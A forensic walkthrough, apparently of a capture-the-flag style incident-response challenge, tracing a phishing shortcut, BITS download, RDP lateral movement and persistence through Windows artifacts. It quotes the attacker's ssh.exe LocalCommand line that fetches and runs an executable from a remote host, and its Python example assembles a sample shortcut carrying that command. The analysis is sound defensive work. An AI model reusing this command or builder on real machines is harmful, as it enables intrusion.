
# OpTinselTrace24–1: Sneaky Cookies Walk-through

We have been given a triage collection of the victim's C drive (`TRIAGE-L3-BELLS`). We need to investigate the following.

**Krampus, a notorious threat actor, possibly social-engineered Bingle as email security filters were offline for maintenance. Find any suspicious files under Bingle Jollybeard's user directory and get back to us with the full file name.**

*Answer: C/Users/Bingle Jollybeard/Documents/christmas\_slab.pdf.lnk*

**Using the malicious file sent as part of phishing, the attacker abused a legitimate binary to download and execute a C\&C stager. What is the full command used to download and execute the C\&C Binary?**

The malicious file is a LNK file, a Windows shell link (shortcut) that stores a target path, optional command-line arguments and, in a TrackerDataBlock, the name of the machine on which it was created. Double-clicking it runs the target with those arguments, so the fields of interest are the target and the arguments. To view its properties, we can use `exiftool`:

<figure><img src="/files/Rk3nka9EW0lCMcPx3gnn" alt=""><figcaption></figcaption></figure>

*Answer:* `C:\Windows\System32\OpenSSH\ssh.exe -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp root@17.43.12.31:/home/revenge/christmas-sale.exe c:\users\public\. && c:\users\public\christmas-sale.exe" revenge@17.43.12.31`

The shortcut carries no payload of its own; it abuses the built-in OpenSSH client. `PermitLocalCommand=yes` together with `LocalCommand=...` makes `ssh.exe` execute the given local command once the session to `17.43.12.31` is established, and `StrictHostKeyChecking=no` suppresses the host-key prompt so the victim sees nothing unusual. The local command fetches `christmas-sale.exe` with `scp` into `C:\Users\Public` and then executes it.
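To show exactly where `exiftool` reads these two answers from, here is an added example (not part of the original write-up, and not the case's own `christmas_slab.pdf.lnk`): a minimal parser for the StringData and TrackerDataBlock sections of the MS-SHLLINK format, plus a builder that assembles a constructed sample shortcut with the command line above and a made-up relative target path. The builder exists only so the example runs offline; the parser skips the IDList and LinkInfo sections by their size fields, reads the StringData strings in spec order, then walks the ExtraData blocks looking for the tracker signature `0xA0000003`.

```python
import struct

# Offsets and flag bits are the documented MS-SHLLINK values. The sample .lnk is
# constructed by build_lnk() below; it is not the shortcut from the case.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
TRACKER_DATA_SIG = 0xA0000003
STRING_FIELDS = (                      # StringData items, in the order they appear
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def _read_string(buf, off):
    """StringData item: CountCharacters (u16) followed by that many UTF-16LE chars."""
    count, = struct.unpack_from("<H", buf, off)
    off += 2
    return buf[off:off + 2 * count].decode("utf-16-le"), off + 2 * count


def parse_lnk(data):
    """Return the target/argument strings and the TrackerDataBlock MachineID."""
    if data[:4] != struct.pack("<I", HEADER_SIZE) or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link file")
    flags, = struct.unpack_from("<I", data, 0x14)
    if not flags & IS_UNICODE:
        raise ValueError("ANSI StringData is not handled by this example")
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (u16) + IDList
        size, = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) counts itself
        size, = struct.unpack_from("<I", data, off)
        off += size
    out = {}
    for flag, key in STRING_FIELDS:
        if flags & flag:
            out[key], off = _read_string(data, off)
    while off + 8 <= len(data):                  # ExtraData blocks until BlockSize < 4
        size, sig = struct.unpack_from("<II", data, off)
        if size < 4:
            break
        if sig == TRACKER_DATA_SIG:
            # MachineID: 16-byte NUL-padded NetBIOS name (max 15 chars) at block offset 16
            raw = data[off + 16:off + 32]
            out["machine_id"] = raw.split(b"\x00", 1)[0].decode("ascii", "replace")
        off += size
    return out


def build_lnk(relative_path, arguments, machine_id):
    """Assemble a minimal shell link containing only the fields the parser inspects."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))      # attributes, timestamps, etc. zeroed
    body = b""
    for s in (relative_path, arguments):
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    tracker = struct.pack("<IIII", 0x60, TRACKER_DATA_SIG, 0x58, 0)   # BlockSize, Sig, Length, Version
    tracker += machine_id.encode("ascii").ljust(16, b"\x00") + b"\x00" * 64   # Droid, DroidBirth
    return header + body + tracker + struct.pack("<I", 0)            # TerminalBlock


# Constructed sample: the command line from the case, with an assumed relative target path.
SAMPLE_ARGS = ('-o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" '
               '-o "LocalCommand=scp root@17.43.12.31:/home/revenge/christmas-sale.exe '
               'c:\\users\\public\\. && c:\\users\\public\\christmas-sale.exe" revenge@17.43.12.31')
SAMPLE_LNK = build_lnk("..\\..\\..\\Windows\\System32\\OpenSSH\\ssh.exe",
                       SAMPLE_ARGS, "christmas-destr")

if __name__ == "__main__":
    for key, value in parse_lnk(SAMPLE_LNK).items():
        print(f"{key}: {value}")
```

Running the module prints the relative path, the full argument string and the machine ID from the constructed sample. The 16-byte MachineID field is why the value in Q5 is a short NetBIOS-style name: the format cannot hold a hostname longer than 15 characters.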

**When was this file run on the system by the victim?**

This information can be obtained from the prefetch files. We know that the file downloaded with `scp` was called `christmas-sale.exe`, and a prefetch file for it exists (`C/Windows/prefetch/CHRISTMAS-SALE.EXE-6FDA5E99.pf`; the suffix is a hash of the executable's path). Prefetch records the last execution time and, on Windows 8 and later, up to seven earlier run times, so a program that ran once has a single timestamp. To extract it we can use PECmd, which requires Windows to run.

<figure><img src="/files/ffvtxoGFFGNfcbrqABdp" alt=""><figcaption></figcaption></figure>

*Answer: 2024–11–05 15:50:33*

**What is the Mitre Sub technique ID for the technique used in Q1 and Q2?**

This can be looked up on <https://attack.mitre.org/techniques/enterprise/>. From the Sherlock description and Q1/Q2 we know that Bingle was social-engineered into opening a file delivered by phishing, and that opening it is what led to the compromise. That is User Execution: Malicious File, T1204.002, which exactly matches this scenario.

*Answer: T1204.002*

**What was the name of threat actor’s machine used to develop/create the malicious file sent as part of phishing?**

This can be seen in the exif metadata of the LNK file under the Machine ID heading. The value comes from the TrackerDataBlock that Windows writes into shortcuts, which records the NetBIOS name (at most 15 characters) of the host on which the shortcut was created, so it names the attacker's build machine rather than the victim's.

*Answer: christmas-destr*

**When did attacker enumerated the running processes on the system?**

This can be found using the same method as Q3. The usual way to list running processes is `tasklist.exe`, and a prefetch file for it exists in the prefetch directory. Running `PECmd` on it gives the execution time.

*Answer: 2024–11–05 15:52:30*

**After establishing a C\&C Channel, attacker proceeded to abuse another Legitimate binary to download an exe file. What is the full URI for this download?**

Here comes the event log examination. We can utilise [Chainsaw](https://github.com/WithSecureLabs/chainsaw) for this. I also downloaded the Sigma rules from the [official repository](https://github.com/SigmaHQ/sigma); Chainsaw applies them, via the event-log mapping, in its `hunt` output, which makes the download stand out without reading every channel by hand.
Command: `/opt/chainsaw/chainsaw hunt ./C/Windows/System32/winevt/logs/ -s /opt/chainsaw/sigma/rules --mapping /opt/chainsaw/mappings/sigma-event-logs-all.yml`

*Answer: <http://13.233.149.250/candies/candydandy.exe>*

<figure><img src="/files/PHAosh3Z07uhJjG2tK2a" alt=""><figcaption></figcaption></figure>

**What is the Mitre ID for the technique used in Q7?**

In the event log above, we can see that the event provider is the Windows Background Intelligent Transfer Service (BITS). BITS is a legitimate download service that attackers use because `bitsadmin` and the BITS PowerShell cmdlets fetch files without a browser and survive reboots; the Microsoft-Windows-Bits-Client/Operational log records the job and its URL (event ID 59), which is the entry Chainsaw surfaced. Searching for BITS in the MITRE techniques list leads to the ID.

*Answer: T1197*

**In the workshop environment, RDP was only allowed internally. It is suspected that the threat actor stole the VPN configuration file for Bingle Jolly Beard, connected to the VPN, and then connected to Bingle’s workstation via RDP. When did they first authenticate and successfully connect to Bingle’s Workstation?**

I found [this](https://ponderthebits.com/2018/02/windows-rdp-related-event-logs-identification-tracking-and-investigation/) to be a great resource for RDP-related investigation. Successful RDP connections are indicated by event ID 1149 in the Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational log. One caveat from that article: 1149 means the client got through the listener (with NLA enabled, that it authenticated at the network level), not by itself that an interactive session was established, so it is worth corroborating with a Security 4624 logon of type 10 from the same source address and with LocalSessionManager events 21/22. Using this information we can search for such events with Chainsaw.
Command: `/opt/chainsaw/chainsaw search -t 'Event.System.EventID: =1149' ./C/Windows/System32/winevt/logs/`

*Answer: 2024–11–05 16:04:26*

Also, in `C/Users/Bingle Jollybeard/AppData/Roaming/Microsoft/Windows/Recent` you can actually find a LNK file that points to Bingle’s VPN configuration file.
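As an added illustration of the corroboration described above (this is example code, not part of the original write-up, and the records are constructed, not taken from the Sherlock's logs): given a list of parsed events in the shape Chainsaw prints for these channels, the function below takes the earliest 1149 that is followed within a short window by a Security 4624 with logon type 10 from the same source address, and reports the connection time, the logon time and the client hostname from the 4624. A 1149 that never gets such a logon, and a type 3 (network) logon from the same address, are both left out, which is the distinction the caveat is about.

```python
from datetime import datetime

# Constructed sample records (not the case's logs). Keys mirror what chainsaw shows
# for these channels: 1149 carries the user and the client's source address, Security
# 4624 carries LogonType and WorkstationName, LocalSessionManager 21 the session ID.
# Times are ISO-8601 strings in UTC.
RCM = "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
LSM = "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
SAMPLE_EVENTS = [
    # listener reached from 10.20.0.9, but no RDP logon follows: not a completed connection
    {"time": "2024-01-10T08:58:30", "channel": RCM, "event_id": 1149,
     "user": "Bingle Jollybeard", "source": "10.20.0.9"},
    # a network (type 3) logon from that same address is SMB, not RDP; it must not corroborate
    {"time": "2024-01-10T08:58:33", "channel": "Security", "event_id": 4624, "logon_type": 3,
     "user": "Bingle Jollybeard", "source": "10.20.0.9", "workstation": "CONSTRUCTED-FILESRV"},
    {"time": "2024-01-10T09:00:02", "channel": RCM, "event_id": 1149,
     "user": "Bingle Jollybeard", "source": "10.20.0.7"},
    {"time": "2024-01-10T09:00:05", "channel": "Security", "event_id": 4624, "logon_type": 10,
     "user": "Bingle Jollybeard", "source": "10.20.0.7", "workstation": "CONSTRUCTED-HOST"},
    {"time": "2024-01-10T09:00:06", "channel": LSM, "event_id": 21,
     "user": "WORKSHOP\\Bingle Jollybeard", "source": "10.20.0.7", "session_id": 3},
]


def _t(s):
    return datetime.fromisoformat(s)


def _rdp_logon_for(conn, events, window_seconds):
    """The Security 4624 LogonType 10 from conn's source address within the window after it."""
    for e in events:
        if e["event_id"] != 4624 or e.get("logon_type") != 10 or e["source"] != conn["source"]:
            continue
        delta = (_t(e["time"]) - _t(conn["time"])).total_seconds()
        if 0 <= delta <= window_seconds:
            return e
    return None


def first_confirmed_rdp_logon(events, window_seconds=60):
    """Earliest 1149 that a type-10 4624 corroborates, with the client hostname the 4624
    records in Workstation Name. Returns None when no connection completed a logon."""
    for conn in sorted((e for e in events if e["event_id"] == 1149), key=lambda e: e["time"]):
        logon = _rdp_logon_for(conn, events, window_seconds)
        if logon:
            return {"connected": conn["time"], "authenticated": logon["time"],
                    "user": logon["user"], "source": conn["source"],
                    "client_host": logon.get("workstation")}
    return None


def uncorroborated_connections(events, window_seconds=60):
    """1149 events with no matching type-10 logon: listener reached, no session."""
    return [e for e in events
            if e["event_id"] == 1149 and _rdp_logon_for(e, events, window_seconds) is None]


if __name__ == "__main__":
    print(first_confirmed_rdp_logon(SAMPLE_EVENTS))
    print([e["source"] for e in uncorroborated_connections(SAMPLE_EVENTS)])
```

The window is deliberately short: on a real host the 4624 lands within seconds of the 1149, and a wide window would start pairing unrelated connections from the same NAT address. To feed real data in, export the two channels with `chainsaw search ... --json` and map the EventData fields onto the keys used above.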

**Any IOC’s we find are critical to understand the scope of the incident. What is the hostname of attacker’s machine making the RDP connection**?

This can be found in the output of the previous question's command. The client's name is also recorded in the Security log: the matching 4624 (logon type 10) carries it in the Workstation Name field, which is a useful cross-check that both entries describe the same connection.

*Answer: XMAS-DESTROYER*

**What is md5 hash of the file downloaded in Q7?**

The file `candydandy.exe` was downloaded. Grepping for it revealed its location in the AmCache. The `Amcache.hve` hive stores information about executables that have been present or executed on the system: full paths, size, version metadata, installation and deletion times, and a SHA1 hash of each file (computed over at most the first 31 MB, which matters only for large binaries), which can be compared against public malware databases. This is exactly what we're gonna do. Running [AmcacheParser](https://download.ericzimmermanstools.com/AmcacheParser.zip) with the following options produced several CSVs; only one of them contained entries for the file, as shown below.
Command: `.\AmcacheParser.exe -f "D:\TRIAGE-L3-BELLS\C\Windows\AppCompat\Programs\Amcache.hve" --csv D:\TRIAGE-L3-BELLS\`

<figure><img src="/files/rnk0VYvZlweNfEmy9C1S" alt=""><figcaption><p>CSV containing Unassociated File Entries</p></figcaption></figure>

We can already see that the file is actually Mimikatz, a popular credential-harvesting tool. AmCache only records SHA1, and an MD5 cannot be derived from it, so looking up the SHA1 hash on VirusTotal gives us the MD5 of the same sample.

*Answer: e930b05efe23891d19bc354a4209be3e*

**Determine the total amount of traffic in KBs during the C\&C control communication from the stager executable.**

Network usage can be analysed with the SRUM (System Resource Usage Monitor) database, which records per-process bytes sent and received. [SrumECmd](https://download.ericzimmermanstools.com/SrumECmd.zip) can be used to parse it.
Command: `.\SrumECmd.exe -f 'D:\TRIAGE-L3-BELLS\C\Windows\System32\SRU\SRUDB.dat' --csv 'D:\TRIAGE-L3-BELLS\'`
We should look for the file that was downloaded and executed when the LNK file was run; from the initial analysis we know it was saved locally as `christmas-sale.exe`. In the network usage CSV, adding the bytes sent and bytes received for that executable and converting the total to KB gives the traffic volume of the C2 communication. One caveat: SRUM persists its in-memory counters to `SRUDB.dat` roughly once an hour, so the most recent activity before an image is taken can be missing or incomplete.

*Answer: 541.286*

<figure><img src="/files/sMHzJzpIidaUBAlxU1Ia" alt=""><figcaption><p>CSV containing Network Usages output</p></figcaption></figure>

**As part of persistence, the attacker added a new user account to the Workstation and granted them higher privileges. What is the name of this account?**

A new user account being created is recorded as event ID 4720. Using Chainsaw to search for such events leads us to the new account. The "higher privileges" part of the question is a separate event: adding the account to a security-enabled local group such as Administrators is logged as 4732 (4728 for a global group), normally moments after the 4720, so checking for it confirms the escalation rather than just the creation.

*Answer: elfdesksupport*

**After completely compromising Bingle’s workstation, the Attacker moved laterally to another system. What is the full username used to login to the system?**

To move laterally, the attacker must have obtained credentials for the other system. A logon attempted with explicitly supplied credentials (for example `mstsc` or `runas` with another account) is recorded as event ID 4648, whose EventData names the account used and the target server. Using Chainsaw to look for these events gives us the username and domain.

*Answer: northpole-nippy\nippy*

<figure><img src="/files/4eeFrXeBueBLGccjHGBu" alt=""><figcaption></figcaption></figure>

**According to the remote desktop event logs, what time did the attack successfully move laterally?**

It took me a while to get this one. Using Chainsaw, I searched for the domain name `northpole-nippy` but none of the timestamps there worked. Then I searched for the domain name in caps and the resulting timestamp worked :confused: The reason is that `chainsaw search` matches case-sensitively unless `-i` (`--ignore-case`) is given, and the remote desktop logs record the name in upper case. For an outbound RDP connection the log to check on the source machine is Microsoft-Windows-TerminalServices-RDPClient/Operational, where event 1024 records the connection attempt and 1102 the established connection.
Command: `/opt/chainsaw/chainsaw search "NORTHPOLE-NIPPY" ./TRIAGE-L3-BELLS/C/Windows/System32/winevt/logs/`

*Answer: 2024–11–05 16:22:36*

**After moving to the other system, the attacker downloaded an executable from an open directory hosted on their infrastructure. What are the two staging folders named?**

I was really stuck on this one because I had no idea how I could investigate the attacker's RDP session and find the folders they accessed on another machine. Searching about it led me to [this](https://medium.com/@ronald.craft/blind-forensics-with-the-rdp-bitmap-cache-16e0c202f91c) Medium article. The RDP client caches the bitmap tiles it receives from the remote desktop so it can redraw them without re-downloading, and that cache is available in our artifacts at `C/Users/Bingle Jollybeard/AppData/Local/Microsoft/Terminal Server Client/Cache/`. Download and run [bmc-tools.py](https://github.com/ANSSI-FR/bmc-tools/blob/master/bmc-tools.py) as follows.
Command: `python bmc-tools.py -s './TRIAGE-L3-BELLS/C/Users/Bingle Jollybeard/AppData/Local/Microsoft/Terminal Server Client/Cache/Cache0000.bin' -d ./rdpcache -b`
The `-b` flag writes a single collage bitmap of all recovered tiles, a great option for viewing everything in one place. Keep in mind that the tiles are small fragments of whatever was drawn on screen during the session, so folder names and commands are reassembled visually rather than read from a log.

*Answer: candies,sweets*

<figure><img src="/files/gh0cIGIpQHydZUauwO6P" alt=""><figcaption></figcaption></figure>

**What is the name of the downloaded executable downloaded from the open directory?**

This can be found in the collage and is visible in the above image too.

*Answer: cookies.exe*

**After downloading the executable from Q17, the attacker utilized the exe to be added as a persistence capability. What is the name they gave to this persistence task?**

Examine the collage and it can be seen that the attacker established persistence by making a registry entry under that name. Some needle-in-the-haystack hunting is needed here, since the relevant tiles are scattered through the collage.

*Answer: christmaseve\_gift*

<figure><img src="/files/qS53wyv15ZJ99zIq31P5" alt=""><figcaption></figcaption></figure>

**To further aid in internal reconnaissance, the threat actor downloads a well-known tool from the Vendor’s website. What is the name of this tool?**

Not very difficult to find in the collage.

*Answer: Advanced IP Scanner*

**Determine the total amount of traffic in KBs during the internal lateral movement, which originated from Bingle’s workstation to the other machine in the network.**

Similar to the earlier network traffic question. Using the SrumECmd output CSV and adding the bytes sent and received for `mstsc.exe` (the Remote Desktop Connection client, which the attacker used for the RDP hop) gives the traffic during the internal lateral movement.

*Answer: 16397.521*

<mark style="color:$info;">\[Originally Published on Dec 31, 2024]</mark>

